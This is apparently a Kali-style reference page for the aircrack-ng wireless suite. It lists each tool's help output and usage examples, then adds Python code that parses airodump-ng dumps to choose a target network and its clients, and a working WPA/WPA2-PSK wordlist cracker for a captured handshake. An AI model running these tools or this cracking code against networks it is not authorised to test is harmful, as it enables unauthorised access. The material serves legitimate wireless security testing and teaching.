Tools included in the aircrack-ng package
airbase-ng – Configure fake access points
root@kali:~# airbase-ng --help
Airbase-ng 1.2 beta3 - (C) 2008-2013 Thomas d'Otreppe
Original work: Martin Beck
http://www.aircrack-ng.org
usage: airbase-ng <options> <replay interface>
Options:
-a bssid : set Access Point MAC address
-i iface : capture packets from this interface
-w WEP key : use this WEP key to en-/decrypt packets
-h MAC : source mac for MITM mode
-f disallow : disallow specified client MACs (default: allow)
-W 0|1 : [don't] set WEP flag in beacons 0|1 (default: auto)
-q : quiet (do not print statistics)
-v : verbose (print more messages)
-A : Ad-Hoc Mode (allows other clients to peer)
-Y in|out|both : external packet processing
-c channel : sets the channel the AP is running on
-X : hidden ESSID
-s : force shared key authentication (default: auto)
-S : set shared key challenge length (default: 128)
-L : Caffe-Latte WEP attack (use if driver can't send frags)
-N : cfrag WEP attack (recommended)
-x nbpps : number of packets per second (default: 100)
-y : disables responses to broadcast probes
-0 : set all WPA,WEP,open tags. can't be used with -z & -Z
-z type : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
-Z type : same as -z, but for WPA2
-V type : fake EAPOL 1=MD5 2=SHA1 3=auto
-F prefix : write all sent and received frames into pcap file
-P : respond to all probes, even when specifying ESSIDs
-I interval : sets the beacon interval value in ms
-C seconds : enables beaconing of probed ESSID values (requires -P)
Filter options:
--bssid MAC : BSSID to filter/use
--bssids file : read a list of BSSIDs out of that file
--client MAC : MAC of client to filter
--clients file : read a list of MACs out of that file
--essid ESSID : specify a single ESSID (default: default)
--essids file : read a list of ESSIDs out of that file
--help : Displays this usage screen
aircrack-ng – Wireless password cracker
root@kali:~# aircrack-ng --help
Aircrack-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
http://www.aircrack-ng.org
usage: aircrack-ng [options] <.cap / .ivs file(s)>
Common options:
-a <amode> : force attack mode (1/WEP, 2/WPA-PSK)
-e <essid> : target selection: network identifier
-b <bssid> : target selection: access point's MAC
-p <nbcpu> : # of CPU to use (default: all CPUs)
-q : enable quiet mode (no status output)
-C <macs> : merge the given APs to a virtual one
-l <file> : write key to file
Static WEP cracking options:
-c : search alpha-numeric characters only
-t : search binary coded decimal chr only
-h : search the numeric key for Fritz!BOX
-d <mask> : use masking of the key (A1:XX:CF:YY)
-m <maddr> : MAC address to filter usable packets
-n <nbits> : WEP key length : 64/128/152/256/512
-i <index> : WEP key index (1 to 4), default: any
-f <fudge> : bruteforce fudge factor, default: 2
-k <korek> : disable one attack method (1 to 17)
-x or -x0 : disable bruteforce for last keybytes
-x1 : last keybyte bruteforcing (default)
-x2 : enable last 2 keybytes bruteforcing
-X : disable bruteforce multithreading
-y : experimental single bruteforce mode
-K : use only old KoreK attacks (pre-PTW)
-s : show the key in ASCII while cracking
-M <num> : specify maximum number of IVs to use
-D : WEP decloak, skips broken keystreams
-P <num> : PTW debug: 1: disable Klein, 2: PTW
-1 : run only 1 try to crack key with PTW
WEP and WPA-PSK cracking options:
-w <words> : path to wordlist(s) filename(s)
WPA-PSK options:
-E <file> : create EWSA Project file v3
-J <file> : create Hashcat Capture file
-S : WPA cracking speed test
Other options:
-u : Displays # of CPUs & MMX/SSE support
--help : Displays this usage screen
airdecap-ng – Decrypt WEP/WPA/WPA2 capture files
root@kali:~# airdecap-ng --help
Airdecap-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
http://www.aircrack-ng.org
usage: airdecap-ng [options] <pcap file>
Common options:
-l : don't remove the 802.11 header
-b <bssid> : access point MAC address filter
-e <essid> : target network SSID
WEP specific option:
-w <key> : target network WEP key in hex
WPA specific options:
-p <pass> : target network WPA passphrase
-k <pmk> : WPA Pairwise Master Key in hex
--help : Displays this usage screen
airdecloak-ng – Removes wep cloaking from a pcap file
root@kali:~# airdecloak-ng --help
Airdecloak-ng 1.2 beta3 - (C) 2008-2013 Thomas d'Otreppe
http://www.aircrack-ng.org
usage: airdecloak-ng [options]
options:
Mandatory:
-i <file> : Input capture file
--ssid <ESSID> : ESSID of the network to filter
or
--bssid <BSSID> : BSSID of the network to filter
Optional:
--filters <filters> : Apply filters (separated by a comma). Filters:
signal: Try to filter based on signal.
duplicate_sn: Remove all duplicate sequence numbers
for both the AP and the client.
duplicate_sn_ap: Remove duplicate sequence number for
the AP only.
duplicate_sn_client: Remove duplicate sequence number for the
client only.
consecutive_sn: Filter based on the fact that IV should
be consecutive (only for AP).
duplicate_iv: Remove all duplicate IV.
signal_dup_consec_sn: Use signal (if available), duplicate and
consecutive sequence number (filtering is
much more precise than using all these
filters one by one).
--null-packets : Assume that null packets can be cloaked.
--disable-base_filter : Do not apply base filter.
--drop-frag : Drop fragmented packets
--help : Displays this usage screen
airdriver-ng – Provides status information about the wireless drivers on your system
root@kali:~# airdriver-ng --help
Found kernel: 3.3.12-kali1-686-pae.3.12-kali1-686-pae
usage: airdriver-ng <command> [drivernumber]
valid commands:
supported - lists all supported drivers
kernel - lists all in-kernel drivers
installed - lists all installed drivers
loaded - lists all loaded drivers
-----------------------------------------------------
insert <drivernum> - inserts a driver
load <drivernum> - loads a driver
unload <drivernum> - unloads a driver
reload <drivernum> - reloads a driver
-----------------------------------------------------
compile <drivernum> - compiles a driver
install <drivernum> - installs a driver
remove <drivernum> - removes a driver
-----------------------------------------------------
compile_stack <stacknum> - compiles a stack
install_stack <stacknum> - installs a stack
remove_stack <stacknum> - removes a stack
-----------------------------------------------------
install_firmware <drivernum> - installs the firmware
remove_firmware <drivernum> - removes the firmware
-----------------------------------------------------
details <drivernum> - prints driver details
detect - detects wireless cards
aireplay-ng – Primary function is to generate traffic for the later use in aircrack-ng
root@kali:~# aireplay-ng --help
Aireplay-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
http://www.aircrack-ng.org
usage: aireplay-ng <options> <replay interface>
Filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
-D : disable AP detection
Replay options:
-x nbpps : number of packets per second
-p fctrl : set frame control word (hex)
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-g value : change ring buffer size (default: 8)
-F : choose first matching packet
Fakeauth attack options:
-e essid : set target AP SSID
-o npckts : number of packets per burst (0=auto, default: 1)
-q sec : seconds between keep-alives
-Q : send reassociation requests
-y prga : keystream for shared key auth
-T n : exit after retry fake auth request n time
Arp Replay attack options:
-j : inject FromDS packets
Fragmentation attack options:
-k IP : set destination IP in fragments
-l IP : set source IP in fragments
Test attack options:
-B : activates the bitrate test
Source options:
-i iface : capture packets from this interface
-r file : extract packets from this pcap file
Miscellaneous options:
-R : disable /dev/rtc usage
--ignore-negative-one : if the interface's channel can't be determined,
ignore the mismatch, needed for unpatched cfg80211
Attack modes (numbers can still be used):
--deauth count : deauthenticate 1 or all stations (-0)
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
--arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)
--caffe-latte : query a client for new IVs (-6)
--cfrag : fragments against a client (-7)
--migmode : attacks WPA migration mode (-8)
--test : tests injection and quality (-9)
--help : Displays this usage screen
airmon-ng – This script can be used to enable monitor mode on wireless interfaces
root@kali:~# airmon-ng --help
usage: airmon-ng <start|stop|check> <interface> [channel or frequency]
airmon-zc – This script can be used to enable monitor mode on wireless interfaces
root@kali:~# airmon-zc --help
usage: airmon-zc <start|stop|check> <interface> [channel or frequency]
airodump-ng – Used for packet capturing of raw 802.11 frames
root@kali:~# airodump-ng --help
Airodump-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
http://www.aircrack-ng.org
usage: airodump-ng <options> <interface>[,<interface>,...]
Options:
--ivs : Save only captured IVs
--gpsd : Use GPSd
--write <prefix> : Dump file prefix
-w : same as --write
--beacons : Record all beacons in dump file
--update <secs> : Display update delay in seconds
--showack : Prints ack/cts/rts statistics
-h : Hides known stations for --showack
-f <msecs> : Time in ms between hopping channels
--berlin <secs> : Time before removing the AP/client
from the screen when no more packets
are received (Default: 120 seconds)
-r <file> : Read packets from that file
-x <msecs> : Active Scanning Simulation
--manufacturer : Display manufacturer from IEEE OUI list
--uptime : Display AP Uptime from Beacon Timestamp
--output-format
<formats> : Output format. Possible values:
pcap, ivs, csv, gps, kismet, netxml
--ignore-negative-one : Removes the message that says
fixed channel <interface>: -1
Filter options:
--encrypt <suite> : Filter APs by cipher suite
--netmask <netmask> : Filter APs by mask
--bssid <bssid> : Filter APs by BSSID
--essid <essid> : Filter APs by ESSID
-a : Filter unassociated clients
By default, airodump-ng hop on 2.4GHz channels.
You can make it capture on other/specific channel(s) by using:
--channel <channels> : Capture on specific channels
--band <abg> : Band on which airodump-ng should hop
-C <frequencies> : Uses these frequencies in MHz to hop
--cswitch <method> : Set channel switching method
0 : FIFO (default)
1 : Round Robin
2 : Hop on last
-s : same as --cswitch
--help : Displays this usage screen
airodump-ng-oui-update – Downloads and parses IEEE OUI list
airodump-ng-oui-updater downloads and parses IEEE OUI list.
airolib-ng – Designed to store and manage essid and password lists
root@kali:~# airolib-ng --help
Airolib-ng 1.2 beta3 - (C) 2007, 2008, 2009 ebfe
http://www.aircrack-ng.org
Usage: airolib-ng <database> <operation> [options]
Operations:
--stats : Output information about the database.
--sql <sql> : Execute specified SQL statement.
--clean [all] : Clean the database from old junk. 'all' will also
reduce filesize if possible and run an integrity check.
--batch : Start batch-processing all combinations of ESSIDs
and passwords.
--verify [all] : Verify a set of randomly chosen PMKs.
If 'all' is given, all invalid PMK will be deleted.
--import [essid|passwd] <file> :
Import a text file as a list of ESSIDs or passwords.
--import cowpatty <file> :
Import a cowpatty file.
--export cowpatty <essid> <file> :
Export to a cowpatty file.
airserv-ng – A wireless card server
root@kali:~# airserv-ng --help
airserv-ng: invalid option -- '-'
Airserv-ng 1.2 beta3 - (C) 2007, 2008, 2009 Andrea Bittau
http://www.aircrack-ng.org
Usage: airserv-ng <options>
Options:
-h : This help screen
-p <port> : TCP port to listen on (default:666)
-d <iface> : Wifi interface to use
-c <chan> : Channel to use
-v <level> : Debug level (1 to 3; default: 1)
airtun-ng – Virtual tunnel interface creator
root@kali:~# airtun-ng --help
Airtun-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
Original work: Martin Beck
http://www.aircrack-ng.org
usage: airtun-ng <options> <replay interface>
-x nbpps : number of packets per second (default: 100)
-a bssid : set Access Point MAC address
: In WDS Mode this sets the Receiver
-i iface : capture packets from this interface
-y file : read PRGA from this file
-w wepkey : use this WEP-KEY to encrypt packets
-t tods : send frames to AP (1) or to client (0)
: or tunnel them into a WDS/Bridge (2)
-r file : read frames out of pcap file
WDS/Bridge Mode options:
-s transmitter : set Transmitter MAC address for WDS Mode
-b : bidirectional mode. This enables communication
: in Transmitter's AND Receiver's networks.
: Works only if you can see both stations.
Repeater options:
--repeat : activates repeat mode
--bssid <mac> : BSSID to repeat
--netmask <mask> : netmask for BSSID filter
--help : Displays this usage screen
besside-ng – Automatically crack WEP & WPA network
root@kali:~# besside-ng --help
besside-ng: invalid option -- '-'
Besside-ng 1.2 beta3 - (C) 2010 Andrea Bittau
http://www.aircrack-ng.org
Usage: besside-ng [options] <interface>
Options:
-b <victim mac> : Victim BSSID
-s <WPA server> : Upload wpa.cap for cracking
-c <chan> : chanlock
-p <pps> : flood rate
-W : WPA only
-v : verbose, -vv for more, etc.
-h : This help screen
buddy-ng – Helper server for easside-ng; runs on a remote host that easside-ng relays its traffic through
root@kali:~# buddy-ng -h
Buddy-ng 1.2 beta3 - (C) 2007,2008 Andrea Bittau
http://www.aircrack-ng.org
Usage: buddy-ng <options>
Options:
-h : This help screen
-p : Don't drop privileges
easside-ng – An auto-magic tool which allows you to communicate via an WEP-encrypted access point
root@kali:~# easside-ng -h
Easside-ng 1.2 beta3 - (C) 2007, 2008, 2009 Andrea Bittau
http://www.aircrack-ng.org
Usage: easside-ng <options>
Options:
-h : This help screen
-v <victim mac> : Victim BSSID
-m <src mac> : Source MAC address
-i <ip> : Source IP address
-r <router ip> : Router IP address
-s <buddy ip> : Buddy-ng IP address (mandatory)
-f <iface> : Interface to use (mandatory)
-c <channel> : Lock card to this channel
-n : Determine Internet IP only
ivstools – This tool handle .ivs files. You can either merge or convert them.
root@kali:~# ivstools
ivsTools 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
http://www.aircrack-ng.org
usage: ivstools --convert <pcap file> <ivs output file>
Extract ivs from a pcap file
ivstools --merge <ivs file 1> <ivs file 2> .. <output file>
Merge ivs files
kstats – Shows the FMS algorithm votes for an .ivs file against a given 104-bit WEP key
root@kali:~# kstats
usage: kstats <ivs file> <104-bit key>
makeivs-ng – Generates initialization vectors
root@kali:~# makeivs-ng --help
makeivs-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
http://www.aircrack-ng.org
usage: makeivs-ng [options]
Common options:
-b <bssid> : Set access point MAC address
-f <num> : Number of first IV
-k <key> : Target network WEP key in hex
-s <num> : Seed used to setup random generator
-w <file> : Filename to write IVs into
-c <num> : Number of IVs to generate
-d <num> : Percentage of dupe IVs
-e <num> : Percentage of erroneous keystreams
-l <num> : Length of keystreams
-n : Ignores weak IVs
-p : Uses prng algorithm to generate IVs
--help : Displays this usage screen
packetforge-ng – Create encrypted packets that can subsequently be used for injection
root@kali:~# packetforge-ng --help
Packetforge-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
Original work: Martin Beck
http://www.aircrack-ng.org
Usage: packetforge-ng <mode> <options>
Forge options:
-p <fctrl> : set frame control word (hex)
-a <bssid> : set Access Point MAC address
-c <dmac> : set Destination MAC address
-h <smac> : set Source MAC address
-j : set FromDS bit
-o : clear ToDS bit
-e : disables WEP encryption
-k <ip[:port]> : set Destination IP [Port]
-l <ip[:port]> : set Source IP [Port]
-t ttl : set Time To Live
-w <file> : write packet to this pcap file
-s <size> : specify size of null packet
-n <packets> : set number of packets to generate
Source options:
-r <file> : read packet from this raw file
-y <file> : read PRGA from this file
Modes:
--arp : forge an ARP packet (-0)
--udp : forge an UDP packet (-1)
--icmp : forge an ICMP packet (-2)
--null : build a null packet (-3)
--custom : build a custom packet (-9)
--help : Displays this usage screen
tkiptun-ng – This tool is able to inject a few frames into a WPA TKIP network with QoS
root@kali:~# tkiptun-ng --help
Tkiptun-ng 1.2 beta3 - (C) 2008-2013 Thomas d'Otreppe
http://www.aircrack-ng.org
usage: tkiptun-ng <options> <replay interface>
Filter options:
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length (default: 80)
-n len : maximum packet length (default: 80)
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-D : disable AP detection
-Z : select packets manually
Replay options:
-x nbpps : number of packets per second
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-e essid : set target AP SSID
-M sec : MIC error timeout in seconds [60]
Debug options:
-K prga : keystream for continuation
-y file : keystream-file for continuation
-j : inject FromDS packets
-P pmk : pmk for verification/vuln testing
-p psk : psk to calculate pmk with essid
source options:
-i iface : capture packets from this interface
-r file : extract packets from this pcap file
--help : Displays this usage screen
wesside-ng – Auto-magic tool which incorporates a number of techniques to seamlessly obtain a WEP key
root@kali:~# wesside-ng -h
Wesside-ng 1.2 beta3 - (C) 2007, 2008, 2009 Andrea Bittau
http://www.aircrack-ng.org
Usage: wesside-ng <options>
Options:
-h : This help screen
-i <iface> : Interface to use (mandatory)
-m <my ip> : My IP address
-n <net ip> : Network IP address
-a <mymac> : Source MAC Address
-c : Do not crack the key
-p <min prga> : Minimum bytes of PRGA to gather
-v <victim mac> : Victim BSSID
-t <threshold> : Cracking threshold
-f <max chan> : Highest scanned chan (default: 11)
-k <txnum> : Ignore acks and tx txnum times
wpaclean – Remove excess data from a pcap file
root@kali:~# wpaclean
Usage: wpaclean <out.cap> <in.cap> [in2.cap] [...]
airdriver-ng Usage Example
root@kali:~# airdriver-ng detect
USB devices (generic detection):
Bus 002 Device 009: ID 0846:9001 NetGear, Inc. WN111(v2) RangeMax Next Wireless [Atheros AR9170+AR9101]
Bus 001 Device 012: ID 050d:0017 Belkin Components B8T017 Bluetooth+EDR 2.1
Bus 001 Device 005: ID 0e0f:0008 VMware, Inc.
airmon-ng Usage Example
Start (start) monitor mode on the wireless interface (wlan0) on the desired channel (6):
root@kali:~# airmon-ng start wlan0 6
Interface Chipset Driver
wlan0 2-2: Atheros carl9170 - [phy4]
(monitor mode enabled on mon0)
airodump-ng Usage Example
Sniff on channel 6 (-c 6), filtering on a BSSID (--bssid 38:60:77:23:B1:CB), writing the capture to disk (-w capture), using the monitor mode interface (mon0):
root@kali:~# airodump-ng -c 6 --bssid 38:60:77:23:B1:CB -w capture mon0
CH 6 ][ Elapsed: 4 s ][ 2014-05-15 17:21
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:60:77:23:B1:CB -79 0 7 0 0 6 54e WPA2 CCMP PSK 6EA10E
BSSID STATION PWR Rate Lost Frames Probe
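Besides the .cap file, `-w capture` also writes capture-01.csv (the csv output format), which is the easiest thing to script against when picking a target. The parser below is an added example, not part of the aircrack-ng suite: it reads that CSV layout (AP table, blank line, station table), selects the AP row for a BSSID, lists its associated clients, and composes the airodump-ng and aircrack-ng command lines shown on this page from the parsed channel and BSSID. The sample CSV is constructed from the values in the usage example above, and the second AP, the station MACs, the prefix `capture` and the interface `mon0` are assumed.

```python
"""Parse airodump-ng's CSV dump (<prefix>-01.csv) and pick a target AP.

Added example, not code from aircrack-ng. The sample below is CONSTRUCTED
to match airodump-ng's CSV writer: an AP table, a blank line, then a
station table. Real files use \\r\\n line endings, which splitlines() handles.
"""
import csv
import shlex

SAMPLE_CSV = (
    "\r\n"
    "BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, "
    "Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key\r\n"
    "38:60:77:23:B1:CB, 2014-05-15 17:21:00, 2014-05-15 17:21:04,  6,  54, WPA2, CCMP, PSK, -79,        7,        0,   0.  0.  0.  0,   6, 6EA10E, \r\n"
    "00:11:22:33:44:55, 2014-05-15 17:21:01, 2014-05-15 17:21:04, 11,  54, WEP , WEP , OPN, -85,        3,       12,   0.  0.  0.  0,   5, guest, \r\n"
    "\r\n"
    "Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs\r\n"
    "AA:BB:CC:DD:EE:FF, 2014-05-15 17:21:02, 2014-05-15 17:21:04, -60,       15, 38:60:77:23:B1:CB, 6EA10E\r\n"
    "11:22:33:44:55:66, 2014-05-15 17:21:02, 2014-05-15 17:21:03, -70,        2, (not associated) , linksys,6EA10E\r\n"
    "\r\n"
)

AP_FIELDS = ["bssid", "first_seen", "last_seen", "channel", "speed", "privacy",
             "cipher", "auth", "power", "beacons", "ivs", "lan_ip", "id_length",
             "essid", "key"]
STA_FIELDS = ["station", "first_seen", "last_seen", "power", "packets", "bssid"]


def parse_airodump_csv(text):
    """Return (aps, stations) as lists of dicts with whitespace-stripped fields."""
    aps, stations, section = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("BSSID,"):
            section = "ap"
            continue
        if line.startswith("Station MAC,"):
            section = "sta"
            continue
        fields = [f.strip() for f in next(csv.reader([line]))]
        if section == "ap" and len(fields) >= len(AP_FIELDS):
            # airodump-ng does not quote ESSIDs, so an ESSID containing ','
            # is split across extra fields; rejoin everything between
            # ID-length and Key (spaces around such commas are lost).
            essid = ",".join(fields[13:-1])
            row = dict(zip(AP_FIELDS, fields[:13] + [essid, fields[-1]]))
            for k in ("channel", "power", "beacons", "ivs"):
                row[k] = int(row[k])
            aps.append(row)
        elif section == "sta" and len(fields) >= len(STA_FIELDS):
            row = dict(zip(STA_FIELDS, fields))
            # probed ESSIDs are comma separated and spill into extra fields
            row["probed"] = [p for p in fields[len(STA_FIELDS):] if p]
            row["associated"] = row["bssid"] != "(not associated)"
            stations.append(row)
    return aps, stations


def pick_target(aps, bssid):
    """AP row for the BSSID the capture is filtered on (case-insensitive)."""
    for ap in aps:
        if ap["bssid"].lower() == bssid.lower():
            return ap
    raise LookupError(f"{bssid} not seen in dump")


def clients_of(stations, bssid):
    """Station MACs currently associated to this BSSID (deauth/handshake targets)."""
    return [s["station"] for s in stations if s["bssid"].lower() == bssid.lower()]


def build_commands(ap, iface="mon0", prefix="capture",
                   wordlist="/usr/share/wordlists/nmap.lst"):
    """The airodump-ng / aircrack-ng lines from the usage examples, with the
    channel and BSSID taken from the parsed dump instead of typed by hand."""
    dump = ["airodump-ng", "-c", str(ap["channel"]), "--bssid", ap["bssid"],
            "-w", prefix, iface]
    crack = ["aircrack-ng", "-b", ap["bssid"], "-w", wordlist, f"{prefix}-01.cap"]
    return shlex.join(dump), shlex.join(crack)


if __name__ == "__main__":
    aps, stas = parse_airodump_csv(SAMPLE_CSV)
    target = pick_target(aps, "38:60:77:23:B1:CB")
    print(f"{target['essid']} ch{target['channel']} {target['privacy']}/{target['cipher']} "
          f"clients={clients_of(stas, target['bssid'])}")
    for cmd in build_commands(target):
        print(cmd)
```

Passing `-b` to aircrack-ng avoids the "Choosing first network as target" guess when the capture contains more than one BSSID.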
aircrack-ng Usage Example
Using the provided wordlist (-w /usr/share/wordlists/nmap.lst), attempt to crack the WPA-PSK passphrase from the capture file (capture-01.cap). A WPA/WPA2-PSK crack needs a captured four-way handshake; airodump-ng prints "WPA handshake: <BSSID>" in its status line once it has seen one. The capture below holds only two packets and no handshake, which is why aircrack-ng lists the network as "No data - WEP or WPA":
root@kali:~# aircrack-ng -w /usr/share/wordlists/nmap.lst capture-01.cap
Opening capture-01.cap
Read 2 packets.
# BSSID ESSID Encryption
1 38:60:77:23:B1:CB 6EA10E No data - WEP or WPA
Choosing first network as target.
Opening capture-01.cap
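What aircrack-ng does with each wordlist entry once a handshake is present, and what airolib-ng --batch precomputes per (ESSID, password) pair, is the derivation below. This is an added example written for this page, not code from the aircrack-ng suite: PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 rounds), PTK = PRF-512(PMK, MACs and nonces of the handshake), and a candidate is accepted when HMAC over EAPOL message 2 with the first 16 bytes of the PTK reproduces the captured MIC (HMAC-MD5 for WPA/TKIP, HMAC-SHA1 for WPA2/CCMP). The PMK check uses the IEEE 802.11i test vector (passphrase "password", SSID "IEEE"). The handshake is constructed inside the block with the page's BSSID and ESSID; the client MAC, nonces and passphrases are assumptions, and `make_handshake` stands in for a real airodump-ng capture.

```python
"""WPA/WPA2-PSK candidate check as done by aircrack-ng on a four-way handshake.

Added example, not aircrack-ng's code. The handshake is CONSTRUCTED by
make_handshake(); in practice the MACs, nonces and EAPOL frame come from
the capture. IEEE_VECTOR is the PMK test vector from IEEE Std 802.11i.
"""
import hashlib
import hmac
import struct

IEEE_VECTOR = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"


def wpa_pmk(passphrase, essid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 rounds, 32 bytes).
    The ESSID is the salt, which is why airolib-ng stores PMKs per ESSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def prf_512(key, label, data):
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def wpa_ptk(pmk, aa, spa, anonce, snonce):
    """PTK from the PMK plus the handshake's MAC addresses and nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_frame, keyver):
    """MIC over EAPOL-Key message 2 with its MIC field (bytes 81..96) zeroed.
    Key descriptor version 1 (WPA/TKIP) uses HMAC-MD5, version 2 (WPA2/CCMP) HMAC-SHA1."""
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]
    digest = hashlib.md5 if keyver == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:16]


def crack_handshake(essid, hs, wordlist):
    """Return the wordlist entry whose KCK reproduces the captured MIC, else None."""
    for word in wordlist:
        kck = wpa_ptk(wpa_pmk(word, essid), hs["aa"], hs["spa"],
                      hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"], hs["keyver"]), hs["mic"]):
            return word
    return None


def make_handshake(essid, passphrase, keyver=2):
    """CONSTRUCTED message-2 EAPOL-Key frame with a MIC valid for `passphrase`.
    Layout: 802.1X header(4) | desc type(1) | key info(2) | key len(2) |
    replay(8) | nonce(32) | IV(16) | RSC(8) | ID(8) | MIC(16) | data len(2)."""
    aa = bytes.fromhex("38607723b1cb")        # BSSID from the usage example
    spa = bytes.fromhex("aabbccddeeff")       # assumed client MAC
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))   # assumed nonces
    key_info = 0x0108 | keyver                # Pairwise + MIC bits, descriptor version
    body = struct.pack(">BHHQ", 2 if keyver == 2 else 254, key_info, 16, 1)
    body += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16
    body += struct.pack(">H", 0)              # no key data, keeps the frame at 99 bytes
    frame = struct.pack(">BBH", 1, 3, len(body)) + body
    kck = wpa_ptk(wpa_pmk(passphrase, essid), aa, spa, anonce, snonce)[:16]
    mic = eapol_mic(kck, frame, keyver)
    frame = frame[:81] + mic + frame[97:]
    return {"aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce,
            "eapol": frame, "mic": mic, "keyver": keyver}


if __name__ == "__main__":
    print("802.11i vector ok:", wpa_pmk("password", "IEEE").hex() == IEEE_VECTOR)
    hs = make_handshake("6EA10E", "correct horse")
    print("found:", crack_handshake("6EA10E", hs, ["password", "letmein", "correct horse"]))
```

The cost of the attack is entirely in `wpa_pmk`: 4096 HMAC-SHA1 rounds per candidate and per ESSID, which is why a precomputed airolib-ng database only helps for the ESSIDs it was built for, and why a wordlist miss (the `None` case) cannot be recovered from without more candidates.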